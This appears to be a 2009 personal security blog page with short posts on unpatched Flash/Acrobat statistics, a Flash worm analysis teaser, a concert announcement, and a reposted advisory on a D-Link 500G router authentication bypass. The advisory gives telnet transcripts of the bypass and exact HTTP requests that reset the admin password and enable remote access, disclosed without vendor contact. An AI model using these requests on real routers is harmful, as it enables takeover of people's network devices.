Xanda's Blog !~!

ClientMe v0.01 Alpha – Preview

Aug
25

Don’t get me wrong.. It is not ready yet.. This is just the preview for one of the components

Research shows that 80% of Web users running unpatched versions of Flash/Acrobat

Aug
25

According to a research published by Trusteer earlier this month, 79.5% of the 2.5 million users of their Rapport security service run a vulnerable version of Adobe Flash, with 83.5% also running a vulnerable version of Acrobat.

The company has also criticized Adobe by insisting that their update mechanism “does not meet the requirements of a system that is used by 99% of users on the Internet and is highly targeted by criminals“, but is praising the update mechanism of Google’s Chrome and Firefox, whose silent updates close the window of opportunity for malicious attackers to take advantage of.

[Read more HERE]

Flash Attack Vectors – Cross Site Flashing (XSF)

Aug
25

A few days ago a lot of media wrote about a Flash worm. I managed to get hold of samples and analyzed it (thanks to Peter Kruse of CSIS for the samples).

First of all, while the exploit code contains Flash, it is actually just used as an attack (or, if we stretch it, infection) vector. The worm itself is contained in JavaScript and is very similar to the Twitter worm I analyzed back in April this year (see http://isc.sans.org/diary.html?storyid=6187). That is not surprising as both worms are attacking similar services.

The worm was first identified on a popular Chinese social web site (for schools, if I’m not wrong), Renren (http://www.renren.com). This site is in many ways similar to Twitter or Facebook, but much more media intensive and it allows users to share various information, including pictures, movies etc.

[Read more HERE]

D-LINK 500G Authentication Bypass

Aug
24

SUMMARY
There is an authentication bypass vulnerability in D-Link 500G that allows an attacker to take full control over the device. Remote access is disabled by default, so the attacker is required to be on the local network.
The bypass can be triggered sending a HTTP request without the HOST header.

$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Host: 192.168.0.1
Connection: close
 
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic Realm="DSL-500G"
Content-type: text/html
Content-length: 111
 
<html><head><title>401 Unauthorized Access</title></head><body><h1>401
Unauthorized Access</h1></body></html>
Connection closed by foreign host.
$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Connection: close
 
HTTP/1.1 302 Document Follows
Location: /hag/pages/home.ssi
 
Connection closed by foreign host.

AFFECTED PRODUCTS
Confirmed in D-Link 500G Firmware R2.01.B9.EU(030917a/T93.3.44).
Haven’t tested in other devices and version.

SOLUTION
The manufacturer has not been contacted. Don’t complain on me.

EXPLOIT

Reset the admin password: GET
/Action?cmdSubmit=Submit&ex_param1=admin&id=3&new_pass1=admin&new_pass2=admin&old_pass=admin&user=admin
HTTP/1.0
Enable remote access: GET /Action?cmdSubmit=Submit&remote=0&id=83
HTTP/1.0
Commit changes: GET /Action?cmdCommit=Commit&reboot_loc=0&id=4 HTTP/1.0

CREDITS
Discovered by Jardel Weyrich <jweyrich at gmail dot com>.

No Use For A Name Live in KL

Aug
24

Just wanna share for those who still don’t know

Date: 10/18/2009
Time: 8:00 PM
Venue: Ruums Club, Kuala Lumpur

See you there 😉

[updated on 25th August 2009 at 11:26PM]

Date: 18th October 2009 (Sunday)
Venue: KL Live (formerly Ruums Club), Kuala Lumpur, Malaysia
Time: 1pm onwards

Support bands: Under 18, Abhorrence, Dosound, Plague of Happiness, Toxitoy, Second Combat, Always Last

Tickets: RM65 (early bird registration), RM75 (door)

On sale at: ALLUNAN SYMFONNY studio cafe & distro (wholly owned by PERMATHA PATHAH PRODUCTION)
#27-2, Jalan PJS 8/12
Dataran Sunway Mentari
46150 Petaling Jaya
Selangor Darul Ehsan,
Malaysia

Hotlines: 016 624 2916, 019 229 3816, 012 669 0243, 018 246 1976, +06591021518 (Singpore)

More info: http://nervhousrecords.blogspot.com/